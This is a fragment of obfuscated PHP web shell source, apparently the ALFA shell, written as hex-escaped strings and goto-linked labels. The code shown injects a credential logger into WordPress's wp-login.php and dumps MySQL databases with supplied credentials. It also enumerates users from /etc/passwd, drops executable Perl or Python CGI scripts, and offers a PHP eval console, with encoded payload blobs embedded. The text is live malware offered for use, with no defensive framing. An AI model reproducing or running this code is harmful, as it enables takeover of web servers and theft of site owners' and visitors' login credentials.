6\103\120\143\66\144\101\x41\x33\x61\x30\x4b\x4b\117\x42\104\x76\x45\104\170\65\x32\110\x45\x4f\103\162\127\x6e\x73\x49\142\x6d\x38\111\104\124\x2f\x44\67\x32\67\170\161\x79\170\x62\64\123\x32\121\x74\124\131\142\127\x4e\102\107\x75\x4b\167\x6c\x71\153\110\x45\x62\x54\x6a\x63\x59\x6b\x4e\x49\110\x69\x49\x6f\70\147\x63\104\142\x50\x66\x5a\61\167\166\x77\124\x67\x4c\x63\131\146\141\103\101\115\151\x4e\x45\x48\121\x44\x7a\x39\147\144\161\x79\66\x63\126\64\x67\167\117\x68\154\x50\x54\x72\144\153\x39\127\65\x78\152\126\115\x76\105\x56\104\117\150\x50\132\x67\167\x6f\x51\x4e\165\x32\x36\x50\153\x6e\71\x39\116\66\124\67\53\x4d\106\x31\x4b\160\170\105\121\157\x4e\145\157\156\x6f\x42\x31\x42\131\162\x53\126\126\x67\x30\167\x49\x65\x5a\122\x58\110\157\x69\170\x52\x2b\107\141\x49\x36\66\x64\x2f\x47\x70\106\x4c\71\60\x39\161\x65\x41\153\x49\131\x35\x77\63\120\x55\x4d\64\144\x59\x37\161\65\x58\x43\142\101\122\x36\x30\130\x53\x6e\162\x4a\130\x66\x66\146\143\62\165\62\172\x30\x73\170\120\x50\x42\x35\x39\x69\x32\x5a\153\x5a\x4e\145\x6a\x59\x70\120\x69\157\117\106\x4f\x41\x38\143\160\x30\x4f\130\147\61\141\x2b\141\x6d\65\157\104\141\x56\64\106\126\x33\x47\115\113\111\170\151\142\106\x46\x39\132\125\x59\164\x61\103\160\x4c\70\104\x79\123\124\x63\147\60\161\53\x57\116\x77\x47\113\x62\x54\165\112\63\x66\120\150\53\x35\x70\x41\130\144\102\x72\x31\65\170\145\70\x46\164\70\x4f\x79\101\143\x51\62\115\162\x47\x5a\x68\x70\125\x51\x5a\x73\x30\x4b\105\121\165\x45\142\64\x5a\143\120\x56\61\104\x64\102\146\121\x47\x43\x48\x63\x62\165\71\166\164\172\x76\132\131\x2f\x7a\x46\x71\166\x71\117\x6d\x42\x4a\115\130\x4b\x68\127\x6d\147\x6f\x44\x57\x42\156\x50\157\x2f\x63\x38\146\162\x79\x6c\150\115\x66\x70\61\101\125\x48\x66\166\x66\163\147\x2b\x4d\165\x35\62\172\107\111\62\172\x47\x6f\x33\x2f\167\x61\110\x70\x77\x53\162\167\x58\144\x58\x33\65\x78\107\146\x59\67\145\x79\x38\x67\x65\57\x51\131\110\x30\162\x41\x54\170\124\151\62\x72\103\x4a\x4b\144\x6d\130\x34\166\63\132\147\x4a\x75\124\x37\71\53\x76\x78\x6c\165\x68\x79\171\x56\x64\x66\x71\130\147\157\124\102\x72\x2f\63\62\x52\125\x2b\157\x56\101\103\x75\x30\x69\152\x4f\112\142\x51\x73\x43\107\127\165\126\x53\112\120\104\x38\104\60\63\147\x6d\x78\60\102\131\153\x4f\x48\x39\71\x41\x4d\117\164\157\x41\x70\105\114\67\x75\x77\132\x6b\65\156\x55\x6a\x31\104\130\70\x57\132\x62\x6e\x58\67\121\117\146\121\57\110\x42\125\x6d\x78\x7a\x61\x34\171\x38\x78\104\123\142\147\142\x75\63\70\x6d\107\x66\x2b\120\62\x41\117\x53\144\60\x77\117\x4c\x32\143\x4a\161\x37\102\61\x6d\x67\x34\x34\x73\x2b\167\120\112\x34\x54\x66\x56\x52\x4f\143\x6e\x48\x56\x58\115\x50\x69\x59\167\x42\155\x45\x6a\x74\60\x2b\110\71\101\x50\x7a\x63\x50\x4a\114\x62\132\x37\x30\142\160\111\116\x62\x7a\156\103\x58\x4f\x39\x42\166\x63\153\x68\x7a\x45\x66\x4f\145\x35\x4e\x50\x74\x53\172\161\x56\155\141\x33\144\142\x6d\x77\x37\145\126\x6a\x46\x46\x4d\x63\144\150\x39\141\141\x48\141\x36\x6f\x52\162\x6c\x59\x54\65\x62\x58\66\x34\146\x76\146\x6a\167\152\x6e\111\x74\x63\117\x62\70\x64\x30\x51\115\131\103\x37\x64\170\x44\x65\142\x6d\x76\x46\x66\x64\x66\65\144\67\131\x74\151\146\63\x30\x33\105\53\64\x4f\x68\62\70\x6c\x6e\53\170\151\x4c\x35\101\x78\x44\x36\x58\x34\x46\116\x75\164\x32\152\x74\115\155\67\153\144\151\x36\143\x2f\x4c\102\x39\x34\151\x71\x4b\172\x38\152\x67\x76\61\x31\116\x56\132\157\x3d\42\x29\x29\x2c\47\x3c\x73\x74\162\x69\x6e\147\x3e\x27\x2c\47\x65\170\145\143\47\51\51"; if ($_POST["\141\x6c\x66\141\x31"] == "\160\145\162\x6c") { $code = $perl; } else { $code = $py; } if (__write_file($name, $code)) { @chmod($name, 493); echo "\x3c\x69\x66\162\141\x6d\x65\40\x73\x72\143\x3d\42" . __ALFA_DATA_FOLDER__ . "\57\x63\147\x69\x61\154\146\x61\x2f" . $name . "\42\x20\167\x69\144\x74\150\x3d\x22\61\x30\60\45\x22\40\x68\x65\151\x67\150\164\75\x22\66\60\x30\160\170\42\x20\x66\162\141\x6d\145\x62\157\x72\144\145\x72\x3d\x22\x30\42\40\x73\164\171\154\145\x3d\x22\157\160\x61\143\x69\x74\x79\72\60\x2e\x39\x3b\146\x69\154\164\145\162\72\40\141\154\x70\x68\x61\50\x6f\x70\141\143\151\x74\171\75\x39\x29\x3b\x6f\166\145\162\x66\154\x6f\167\72\141\x75\164\157\x3b\42\76\74\57\x69\x66\x72\x61\155\x65\x3e"; } } echo $div; alfafooter(); } goto JSX0M; xbej7: define("\101\x4c\x46\101\137\124\x45\115\120\x44\111\x52", function_exists("\163\171\163\137\147\x65\164\x5f\164\x65\155\x70\x5f\x64\x69\x72") ? @is_writable(str_replace("\134", "\x2f", sys_get_temp_dir())) ? sys_get_temp_dir() : (@is_writable("\x2e") ? "\x2e" : false) : false); goto U9EXo; L1kU5: function hijackwp($path, $saveto) { $code = "\x24\x61\154\x66\x61\x5f\x66\x69\154\x65\75\x22\173\163\141\166\145\164\157\x5f\160\x61\164\x68\175\x22\x3b\x24\x66\160\40\75\x20\146\x6f\160\x65\x6e\x28\x24\x61\x6c\x66\141\x5f\146\151\154\x65\54\x20\42\141\53\42\x29\x3b\146\x77\162\151\164\x65\50\44\x66\x70\x2c\x20\x24\x5f\x50\x4f\x53\x54\133\47\154\157\147\47\135\x2e\42\x20\72\x20\x22\56\44\137\x50\x4f\x53\124\133\x27\160\x77\144\x27\135\56\x22\40\x28\42\56\x28\44\x75\163\145\x72\x2d\x3e\x75\x73\145\x72\137\145\x6d\x61\151\154\51\56\42\51\134\156\x22\51\73\146\x63\154\x6f\163\145\x28\x24\146\160\x29\73\x24\x66\x20\75\40\x40\146\151\x6c\145\50\x24\x61\x6c\x66\x61\x5f\x66\x69\x6c\145\51\x3b\44\x6e\145\x77\x20\75\x20\141\x72\x72\x61\171\x5f\165\156\x69\161\x75\x65\50\44\146\x29\x3b\x24\146\160\40\x3d\40\100\146\x6f\160\145\x6e\50\x24\x61\154\x66\x61\137\146\x69\154\145\x2c\40\x22\167\x22\x29\73\146\x6f\162\145\141\x63\x68\50\44\x6e\x65\x77\x20\141\163\x20\44\166\x61\x6c\x75\145\163\51\x7b\x40\x66\x70\x75\x74\x73\x28\44\x66\160\54\x20\44\166\x61\154\x75\x65\163\51\x3b\175\100\x66\x63\x6c\x6f\163\145\50\44\146\x70\51\73"; $redirect_wp = "\x23\151\146\133\x20\135\x7b\60\54\x7d\x5c\x28\x5b\x20\135\x7b\x30\x2c\175\41\133\x20\x5d\x7b\60\x2c\175\151\163\x5f\167\x70\137\145\162\x72\157\x72\134\50\133\x20\135\x7b\x30\x2c\175\x5c\x24\x75\x73\x65\162\x5b\40\x5d\x7b\60\54\175\x5c\x29\133\40\x5d\x7b\60\x2c\x7d\x26\x26\x5b\40\x5d\x7b\60\x2c\175\41\x5b\40\x5d\x7b\60\54\x7d\x5c\x24\162\145\x61\x75\164\150\133\x20\x5d\x7b\60\x2c\x7d\x5c\51\133\40\x5d\173\60\54\x7d\173\43"; $code = str_replace("\173\163\x61\166\x65\164\157\137\x70\x61\164\150\175", $saveto, $code); $login = $path . "\x2f\167\x70\55\154\157\147\151\156\56\160\150\160"; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (@preg_match($redirect_wp, $data_login, $match)) { $evil_login = "\11" . $match[0] . "\12\x9" . $code; $login_replace = @preg_replace($redirect_wp, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto Enl9a; uDqvN: function alfalogout() { @setcookie("\x41\154\146\x61\125\x73\145\162", null, 2012); @setcookie("\101\154\x66\x61\x50\141\x73\x73", null, 2012); unset($_COOKIE["\x41\154\x66\x61\125\163\x65\162"], $_COOKIE["\101\154\146\x61\x50\x61\163\163"]); echo "\157\153"; } goto fabm5; KdxiI: if (isset($_POST["\x61\152\141\170"])) { function AlfaNum() { $args = func_get_args(); $alfax = array(); $find = array(); for ($i = 1; $i <= 10; $i++) { $alfax[] = $i; } foreach ($args as $arg) { $find[] = $arg; } echo "\74\163\x63\x72\151\x70\x74\x3e"; foreach ($alfax as $alfa) { if (in_array($alfa, $find)) { continue; } echo "\x61\x6c\x66\x61" . $alfa . "\137\75"; } echo "\x22\42\x3c\x2f\163\143\x72\x69\160\x74\76"; } } goto e_ypN; j0eD9: function alfaDumper() { alfahead(); echo "\74\x64\x69\x76\40\143\x6c\x61\163\163\75\42\150\145\141\144\145\x72\42\76"; AlfaNum(8, 9, 10); echo "\74\143\145\x6e\164\x65\x72\76\74\142\162\x3e\74\x64\x69\166\40\143\x6c\141\163\163\75\x27\164\170\164\x66\157\x6e\164\137\150\x65\x61\144\145\162\47\76\x7c\x20\x4d\x79\x73\161\154\x20\104\141\x74\x61\x62\141\x73\x65\40\104\165\155\x70\x65\x72\x20\x7c\74\x2f\x64\151\x76\x3e\74\x62\x72\x3e\74\142\162\76" . getConfigHtml("\141\154\x6c") . "\x3c\x66\x6f\x72\155\40\155\x65\x74\150\x6f\x64\75\47\160\x6f\x73\x74\47\x20\157\x6e\163\x75\x62\155\x69\164\x3d\x22\x67\x28\x27\x64\165\x6d\x70\x65\x72\47\x2c\156\x75\x6c\154\54\156\x75\154\154\54\x6e\x75\x6c\x6c\54\x74\x68\151\163\x2e\x64\142\x5f\x75\163\x65\162\156\141\x6d\145\x2e\166\x61\x6c\165\x65\54\x74\150\151\163\56\144\142\x5f\160\x61\163\x73\x77\157\x72\x64\x2e\x76\141\154\x75\145\54\164\150\151\x73\56\144\x62\137\156\141\155\145\x2e\166\141\x6c\165\x65\54\164\150\x69\163\56\x64\146\x69\x6c\145\x2e\166\x61\154\165\x65\54\164\150\151\x73\56\x64\x62\x5f\x68\x6f\163\164\56\x76\141\x6c\x75\x65\x29\73\40\x72\x65\164\165\x72\156\40\146\x61\154\x73\x65\x3b\x22\76\x3c\x70\76"; $table = array("\x74\x64\61" => array("\x63\x6f\x6c\157\162" => "\106\106\x46\x46\x46\106", "\164\x64\116\x61\x6d\x65" => "\x64\x62\137\150\x6f\x73\x74\x20\72\x20", "\151\156\x70\x75\x74\116\141\x6d\x65" => "\x64\142\x5f\x68\x6f\163\x74", "\151\144" => "\x64\x62\137\150\157\x73\164", "\x69\x6e\x70\x75\164\126\141\x6c\165\x65" => "\154\x6f\x63\141\154\x68\x6f\163\164", "\x69\x6e\160\x75\x74\123\x69\x7a\x65" => "\65\60"), "\x74\x64\x32" => array("\143\157\x6c\157\162" => "\106\106\x46\x46\106\106", "\164\x64\116\x61\x6d\x65" => "\144\142\x5f\x75\x73\x65\x72\156\x61\155\145\x20\72\x20", "\151\156\160\x75\164\x4e\x61\x6d\x65" => "\144\x62\x5f\165\163\145\x72\x6e\141\x6d\145", "\x69\x64" => "\x64\142\137\x75\x73\145\162", "\x69\156\160\165\x74\126\141\x6c\x75\145" => '', "\151\156\160\x75\x74\x53\151\x7a\x65" => "\65\x30"), "\x74\144\63" => array("\x63\x6f\154\157\162" => "\x46\x46\x46\x46\x46\106", "\x74\144\x4e\141\x6d\145" => "\x64\x62\137\160\x61\x73\x73\167\157\162\x64\40\72\40", "\x69\156\x70\x75\x74\116\141\x6d\x65" => "\x64\142\137\160\141\163\x73\167\157\x72\144", "\151\144" => "\144\x62\137\160\167", "\x69\x6e\x70\x75\x74\126\141\154\x75\x65" => '', "\x69\x6e\x70\165\x74\x53\151\172\145" => "\65\x30"), "\x74\x64\64" => array("\x63\x6f\x6c\x6f\x72" => "\106\x46\106\x46\x46\x46", "\164\x64\x4e\141\155\x65" => "\144\x62\137\156\x61\x6d\x65\40\72\x20", "\x69\x6e\x70\165\x74\116\141\x6d\145" => "\x64\142\x5f\x6e\x61\155\145", "\x69\144" => "\x64\x62\137\156\x61\x6d\x65", "\151\x6e\x70\165\x74\126\141\154\165\145" => '', "\x69\x6e\x70\x75\164\123\x69\172\x65" => "\65\x30"), "\x74\144\65" => array("\x63\157\154\x6f\162" => "\106\106\x46\106\106\106", "\x74\x64\x4e\x61\155\145" => "\104\165\x6d\x70\40\120\141\164\150\72\40", "\151\156\x70\x75\x74\x4e\x61\x6d\145" => "\x64\146\x69\x6c\x65", "\x69\x6e\160\x75\x74\x56\141\154\x75\x65" => htmlspecialchars($GLOBALS["\x63\x77\x64"]) . "\141\154\146\141\x2e\163\x71\154", "\151\156\x70\x75\164\x53\x69\172\x65" => "\x35\x30")); create_table($table); echo "\74\142\x72\76\74\x69\156\x70\x75\164\x20\164\x79\x70\x65\x3d\x27\163\165\142\155\x69\164\47\x20\x76\x61\154\x75\x65\x3d\47\x20\47\x20\x6e\x61\x6d\x65\75\x27\x53\x75\142\155\x69\x74\47\x3e\74\57\160\76\x3c\x2f\146\x6f\162\155\x3e\x3c\57\x63\x65\156\164\x65\x72\76"; $username = $_POST["\141\x6c\146\x61\x33"]; $password = $_POST["\x61\154\146\141\x34"]; $dbname = $_POST["\141\x6c\146\141\x35"]; $dfile = $_POST["\141\154\146\141\x36"]; $host = $_POST["\x61\x6c\x66\141\67"]; if (!empty($dbname)) { echo __pre(); $msg = "\74\143\145\x6e\x74\x65\x72\x3e\x43\x68\145\143\153\40\x74\x68\x69\x73\x20\72\x20\x20\74\x66\157\x6e\x74\x20\x63\x6f\x6c\157\x72\75\47\162\x65\x64\47\76" . $dfile . "\x3c\57\x66\x6f\x6e\164\76\74\57\143\145\x6e\164\145\162\76"; if (@mysqli_connect($host, $username, $password, $dbname)) { if (strlen(alfaEx("\155\171\x73\161\154\144\x75\x6d\x70")) > 0) { alfaEx("\x6d\171\x73\x71\154\144\165\x6d\x70\x20\x2d\55\x73\x69\x6e\147\x6c\x65\x2d\164\162\141\x6e\x73\x61\x63\x74\x69\x6f\156\40\x2d\x2d\150\157\163\x74\75\42{$host}\42\x20\55\x2d\x75\163\145\162\75\42{$username}\42\x20\55\55\x70\x61\163\x73\x77\x6f\162\x64\x3d\42{$password}\42\40{$dbname}\40\76\x20\x27" . addslashes($dfile) . "\47"); echo $msg; } else { __alert("\x45\x72\x72\157\162\x2e\x2e\x2e\x21"); } } else { echo "\x3c\143\x65\x6e\164\x65\x72\x3e\155\171\x73\x71\x6c\151\137\143\x6f\x6e\156\145\143\x74\40\72\40\105\x72\x72\157\162\41\74\x2f\143\x65\156\164\x65\x72\x3e"; } } echo "\74\x2f\144\151\x76\76"; alfafooter(); } goto LJenm; CrZw0: @ini_set("\155\x61\x78\137\x65\x78\145\x63\165\164\x69\x6f\156\x5f\x74\151\155\145", 0); goto DvZ1R; GzEVq: function alfaFilesMan2() { alfahead(); AlfaNum(8, 9, 10, 7, 6, 5, 4); echo "\74\144\151\166\40\x73\x74\x79\x6c\145\75\42\160\x6f\163\151\x74\151\x6f\x6e\72\162\x65\154\x61\164\151\166\145\x3b\x22\x20\x66\155\137\151\144\75\42\61\x22\40\x69\144\75\42\x66\151\x6c\145\163\155\141\156\137\x68\x6f\x6c\144\145\x72\x5f\61\42\40\x63\x6c\x61\163\163\75\x22\x61\x6a\x61\170\x61\162\145\141\40\146\x69\154\145\x73\155\x61\156\55\x61\x63\x74\151\x76\x65\x2d\143\157\156\x74\x65\x6e\x74\x22\x3e\74\x64\x69\x76\40\x63\x6c\141\x73\163\75\42\150\145\x61\x64\145\162\42\76\x3c\x2f\144\x69\166\76\x3c\57\144\151\166\76"; alfaFooter(); } goto eiihp; fWEJX: function alfabasedir() { alfahead(); echo "\74\x64\x69\166\x20\143\x6c\x61\163\x73\75\x68\x65\x61\144\x65\x72\x3e\xa\74\x63\145\x6e\x74\145\x72\76\x3c\x70\x3e\74\x64\151\x76\x20\x63\154\x61\x73\163\75\42\x74\170\x74\x66\x6f\x6e\164\137\150\x65\141\144\145\x72\x22\76\174\40\x4f\160\145\x6e\x20\102\x61\x73\145\x20\104\151\162\x20\174\x3c\x2f\144\151\166\x3e\74\57\x70\x3e\x3c\57\x63\145\156\x74\145\x72\x3e"; $passwd = _alfa_file("\x2f\145\x74\x63\57\x70\x61\x73\x73\x77\x64"); if (is_array($passwd)) { $users = array(); $makepwd = alfaMakePwd(); $basedir = @ini_get("\157\160\145\156\x5f\x62\x61\163\x65\144\151\x72"); $safe_mode = @ini_get("\163\141\x66\x65\x5f\x6d\157\x64\145"); if (_alfa_can_runCommand(true, false) && ($basedir || $safe_mode)) { $bash = "\146\132\x42\x50\x53\167\x4d\170\105\x4d\x58\120\x7a\x61\143\x59\x78\x39\152\x75\x67\x6b\x76\x59\x39\x6c\x62\160\x54\121\x39\145\x46\x55\x39\116\x57\x64\131\153\x32\167\x59\153\127\x5a\113\x73\x67\155\x75\53\x75\71\x4e\x61\x53\70\105\57\x63\167\147\x44\x4c\57\x4e\x2b\115\x2b\x2f\171\121\x6a\x78\x62\x4a\x2b\113\x4f\63\144\64\57\x72\x48\x6a\x4e\x75\163\107\160\x5a\x4c\x32\104\x6d\105\111\124\x54\120\x2f\123\113\x6c\x4f\125\x49\167\x4f\161\116\x56\x54\x76\x67\x4c\x78\x47\x32\x4d\x42\60\x43\x73\x47\x6b\111\x54\x69\x6f\172\67\x58\x35\120\71\x72\x69\116\66\x30\150\172\x68\x48\124\x76\x4c\131\156\x35\111\157\130\146\142\101\x75\x64\x59\x42\130\125\125\x71\x48\130\x39\x77\x50\151\x45\132\104\132\121\x43\x6a\x34\117\115\x38\x30\x37\x50\111\131\x6f\x76\x6c\167\145\x76\x48\170\120\x69\x48\x65\60\x61\x57\x6d\x56\105\x37\146\x37\x42\141\123\x34\x57\163\x38\167\x45\163\127\101\145\70\x55\x45\x4f\103\x53\151\x2b\150\66\155\157\121\x4a\x69\x6e\122\164\172\107\x2b\66\146\111\107\164\x47\145\124\x70\x38\x63\x37\x43\x71\157\64\x69\x34\x64\x41\x46\102\67\170\170\x69\107\141\153\120\144\147\x53\170\x74\x4e\x36\x4f\x78\x41\x2f\130\67\x67\x65\x50\153\x33\x55\164\111\x50\x69\x64\x64\x4d\145\62\144\x4f\145\x38\x77\121\x4e\67\116\120"; $tmp_path = alfaWriteTocgiapi("\142\141\163\x65\144\x69\162\x2e\141\x6c\x66\141", $bash); $bash_users = alfaEx("\x63\144\x20" . $tmp_path . "\57\141\154\x66\x61\x63\x67\x69\141\x70\151\x3b\x73\x68\x20\142\x61\x73\x65\144\151\162\x2e\141\x6c\146\x61\40" . $makepwd, false, true, true); $users = json_decode($bash_users, true); $x = count($users); if ($x >= 2) { array_pop($users); --$x; } } if (!$basedir && !$safe_mode) { $x = 0; foreach ($passwd as $str) { $pos = strpos($str, "\x3a"); $username = substr($str, 0, $pos); $dirz = str_replace("\x7b\x75\163\x65\x72\175", $username, $makepwd); if ($username != '') { if (@is_readable($dirz)) { array_push($users, $username); $x++; } } } } echo "\x3c\142\162\76\x3c\142\162\76"; echo "\74\142\x3e\74\x66\157\156\164\40\x63\x6f\x6c\x6f\x72\75\42\x23\x30\60\101\x32\x32\x30\42\76\133\53\x5d\x20\x46\x6f\x75\x6e\144\x65\144\40" . sizeof($passwd) . "\40\x65\156\164\x72\x79\163\x20\151\x6e\40\x2f\x65\x74\x63\x2f\160\141\x73\163\x77\144\xa" . "\74\x62\162\x20\x2f\x3e\74\57\x66\x6f\x6e\x74\x3e\74\x2f\x62\76"; echo "\x3c\142\x3e\x3c\146\157\156\x74\x20\143\157\154\x6f\x72\75\42\x23\106\106\106\x46\x46\x46\42\x3e\133\53\x5d\x20\x46\157\x75\x6e\x64\x65\144\x20" . $x . "\40\x72\x65\141\x64\141\x62\154\145\40" . str_replace("\173\x75\x73\145\162\175", "\x2a", $makepwd) . "\x20\144\151\x72\145\x63\164\157\x72\151\145\163\xa" . "\74\x62\162\x20\x2f\x3e\74\x2f\x66\x6f\156\164\76\x3c\x2f\x62\x3e"; echo "\x3c\x62\76\74\146\x6f\156\x74\40\x63\157\154\157\162\75\x22\x23\x46\x46\60\x30\60\x30\x22\76\x5b\x7e\135\x20\123\145\x61\162\x63\x68\x69\x6e\x67\x20\146\157\162\40\x70\141\x73\163\167\157\x72\144\163\x20\x69\156\40\x63\x6f\156\146\x69\147\x20\146\151\x6c\145\x73\x2e\x2e\56\xa\12" . "\x3c\x62\x72\40\57\x3e\x3c\142\162\x20\x2f\76\74\x62\x72\x20\x2f\x3e\x3c\57\x66\x6f\156\164\x3e\74\x2f\142\x3e"; foreach ($users as $user) { if (empty($user)) { continue; } $path = str_replace("\173\x75\x73\145\x72\x7d", $user, $makepwd); echo "\x3c\146\x6f\162\155\x20\155\145\164\x68\x6f\x64\x3d\x70\x6f\163\164\x20\157\156\x73\165\142\x6d\151\x74\75\47\x67\x28\x22\x46\x69\x6c\145\x73\115\x61\156\42\x2c\164\150\151\163\56\x63\56\x76\x61\x6c\x75\145\x2c\x22\x22\51\73\x72\x65\x74\165\x72\156\x20\x66\141\x6c\x73\x65\x3b\x27\x3e\74\163\160\141\x6e\76\x3c\x66\x6f\x6e\164\40\x63\x6f\x6c\157\x72\75\43\62\67\x39\67\71\x42\76\103\x68\x61\x6e\147\145\40\x44\151\162\40\x3c\x66\x6f\x6e\x74\40\143\157\x6c\157\x72\x3d\43\106\106\106\x46\x30\x31\x3e\x2e\56\72\72\x20\x3c\x2f\x66\x6f\156\164\76\x3c\146\157\156\x74\40\143\157\x6c\157\162\x3d\162\145\x64\x3e\x3c\142\x3e{$user}\x3c\57\x62\x3e\74\57\x66\x6f\156\164\x3e\74\146\157\x6e\164\x20\x63\157\x6c\157\162\75\43\x46\106\106\106\60\x31\x3e\x20\72\72\56\56\x3c\57\x66\157\156\x74\76\74\x2f\146\x6f\x6e\164\x3e\74\x2f\163\x70\141\x6e\x3e\74\x62\x72\76\x3c\x69\x6e\160\x75\164\40\143\154\141\163\163\75\47\146\x6f\157\164\164\x61\142\154\x65\47\x20\164\x79\160\x65\75\164\x65\x78\164\40\156\141\155\145\75\143\40\x76\x61\x6c\165\145\75\x27{$path}\x27\x3e\x3c\x69\x6e\160\165\164\x20\164\171\x70\x65\x3d\x73\165\x62\155\151\164\x20\166\x61\x6c\x75\x65\75\x27\76\x3e\x27\x3e\x3c\57\x66\x6f\x72\155\x3e\x3c\x62\x72\76"; } } else { echo "\74\142\76\40\x3c\143\x65\156\164\x65\x72\76\x3c\146\x6f\156\164\40\x63\x6f\154\157\x72\75\x22\x23\106\x46\106\106\x46\x46\42\76\133\x2d\135\x20\105\162\162\157\162\40\x3a\x20\x63\157\x75\x64\156\140\164\40\162\145\x61\x64\40\57\145\164\x63\x2f\160\141\x73\x73\167\144\x20\x5b\55\x5d\x3c\x2f\146\x6f\x6e\164\76\x3c\57\x63\x65\x6e\x74\145\162\x3e\74\x2f\x62\76"; } echo "\74\142\x72\76\74\x62\162\x3e\x3c\57\x62\76"; echo "\x3c\x2f\x64\151\166\76"; alfafooter(); } goto kcHRT; Wo4n0: function create_table($data) { echo "\x3c\164\x61\142\x6c\x65\x20\x62\x6f\162\144\145\162\75\x22\61\x22\x3e"; foreach ($data as $key => $val) { $array = array(); foreach ($val as $k => $v) { $array[$k] = $v; } echo "\x3c\x74\x72\76\x3c\x74\144\x3e\x3c\x64\151\x76\40\x63\154\x61\x73\x73\x3d\x27\164\142\154\164\x78\x74\x27\x3e" . $array["\x74\144\x4e\141\155\145"] . "\74\57\x64\151\166\x3e\74\57\x74\x64\x3e\74\164\144\x3e\x3c\151\156\160\x75\x74\x20\x74\171\x70\145\x3d\x27\x74\145\x78\x74\x27\40\x69\x64\75\47" . $array["\x69\144"] . "\47\40\156\141\155\x65\x3d\47" . $array["\x69\156\x70\x75\164\116\x61\x6d\x65"] . "\47\40" . ($array["\x70\x6c\141\x63\145\x68\x6f\154\x64\145\162"] ? "\160\x6c\x61\x63\x65\x68\x6f\154\x64\x65\x72" : "\x76\141\x6c\165\x65") . "\75\x27" . $array["\x69\x6e\160\x75\x74\126\x61\154\x75\x65"] . "\x27\x20\x73\151\x7a\145\75\x27" . $array["\x69\156\160\165\x74\x53\x69\x7a\145"] . "\47\x20" . ($array["\144\x69\163\x61\x62\154\x65\144"] ? "\144\151\x73\x61\142\154\x65\x64" : '') . "\76\74\x2f\164\144\x3e\74\x2f\x74\x72\76"; } echo "\74\x2f\x74\141\142\154\x65\76"; } goto asGME; hId6W: function alfaphpeval() { if (isset($_COOKIE["\145\166\141\x6c\x5f\x74\155\160\144\x69\x72"]) && @is_dir($_COOKIE["\145\x76\141\154\x5f\164\155\160\x64\151\x72"])) { $tempdir = __ZGVjb2Rlcg($_COOKIE["\x65\166\x61\x6c\137\164\x6d\x70\x64\151\162"]); } else { $tempdir = dirname(alfaEx("\x6d\153\164\145\155\160")); __alfa_set_cookie("\x65\166\x61\x6c\137\x74\155\160\x64\151\162", __ZW5jb2Rlcg($tempdir)); } alfahead(); if (isset($_POST["\141\x6c\x66\x61\62"]) && $_POST["\x61\x6c\146\x61\62"] == "\x69\156\151") { echo "\x3c\x64\151\166\40\x63\154\x61\x73\163\75\x68\x65\141\144\145\x72\76"; ob_start(); $INI = ini_get_all(); print "\74\x74\x61\x62\x6c\x65\x20\142\x6f\162\x64\x65\x72\x3d\x30\x3e\x3c\164\162\x3e" . "\x3c\x74\x64\x20\x63\154\x61\163\163\75\42\154\151\x73\x74\x69\x6e\x67\42\x3e\x3c\x66\157\x6e\x74\40\143\x6c\141\x73\x73\75\42\x68\151\x67\150\154\151\x67\150\164\x5f\164\170\164\42\76\x50\x61\x72\141\x6d\x3c\x2f\164\x64\76" . "\x3c\164\x64\40\x63\x6c\x61\163\163\x3d\x22\x6c\151\163\164\x69\x6e\x67\x22\76\74\x66\x6f\156\x74\x20\143\x6c\x61\163\163\x3d\42\x68\x69\x67\150\154\151\x67\150\164\137\164\x78\164\42\76\x47\x6c\x6f\x62\x61\154\x20\x76\141\154\165\145\74\57\164\144\x3e" . "\74\x74\x64\x20\x63\x6c\x61\x73\163\x3d\42\x6c\x69\x73\x74\x69\156\x67\42\76\74\x66\x6f\x6e\x74\40\143\x6c\141\163\163\x3d\x22\x68\x69\x67\150\154\x69\x67\150\164\137\164\170\x74\42\76\x4c\x6f\x63\141\154\40\126\x61\154\165\145\74\57\164\x64\76" . "\74\164\x64\x20\x63\x6c\141\163\163\x3d\42\x6c\151\x73\164\x69\x6e\x67\42\76\74\x66\157\156\164\x20\143\x6c\x61\x73\x73\x3d\42\x68\151\x67\150\154\x69\x67\150\x74\137\x74\x78\164\x22\x3e\x41\143\143\145\x73\x73\x3c\57\164\144\x3e\x3c\57\164\x72\x3e"; foreach ($INI as $param => $values) { print "\12" . "\x3c\164\162\76" . "\74\x74\144\40\x63\154\141\163\163\75\42\154\151\x73\x74\x69\156\x67\42\x3e\74\x62\76" . $param . "\x3c\x2f\164\144\76" . "\x3c\164\144\x20\x63\154\141\163\163\x3d\x22\154\x69\x73\164\x69\156\147\x22\76" . $values["\x67\154\157\142\141\x6c\x5f\x76\141\x6c\x75\x65"] . "\40\74\x2f\164\x64\x3e" . "\74\x74\144\40\x63\154\x61\x73\x73\x3d\42\x6c\x69\163\164\151\x6e\147\42\x3e" . $values["\154\157\x63\x61\x6c\137\166\x61\154\x75\145"] . "\40\74\x2f\164\x64\76" . "\74\164\144\40\143\154\x61\163\163\75\42\x6c\x69\x73\164\151\156\x67\x22\76" . $values["\x61\x63\x63\145\x73\x73"] . "\40\x3c\x2f\164\144\76\x3c\57\164\162\76"; } $tmp = ob_get_clean(); $tmp = preg_replace("\x21\x28\142\x6f\144\x79\174\x61\x3a\x5c\167\x2b\174\x62\x6f\x64\x79\54\x20\164\144\54\x20\164\x68\x2c\40\x68\x31\54\x20\x68\x32\x29\x20\x7b\x2e\52\x7d\x21\x6d\163\151\125", '', $tmp); $tmp = preg_replace("\41\x74\x64\54\x20\164\150\x20\x7b\50\56\x2a\x29\x7d\x21\155\163\x69\125", "\56\x65\54\40\x2e\166\x2c\x20\x2e\x68\54\40\56\150\x20\164\x68\x20\173\x24\61\175", $tmp); echo str_replace("\x3c\x68\x31", "\x3c\150\x32", $tmp) . "\x3c\57\x64\x69\x76\76\x3c\142\x72\x3e"; } if (isset($_POST["\141\x6c\x66\x61\62"]) && $_POST["\x61\x6c\x66\x61\x32"] == "\x69\156\146\x6f") { echo "\x3c\x64\x69\x76\x20\x63\154\141\x73\163\x3d\x68\145\x61\x64\145\162\76\x3c\163\x74\x79\x6c\145\76\56\160\x20\x7b\x63\157\x6c\x6f\162\72\x23\60\x30\60\73\x7d\74\57\x73\164\x79\x6c\145\76"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = 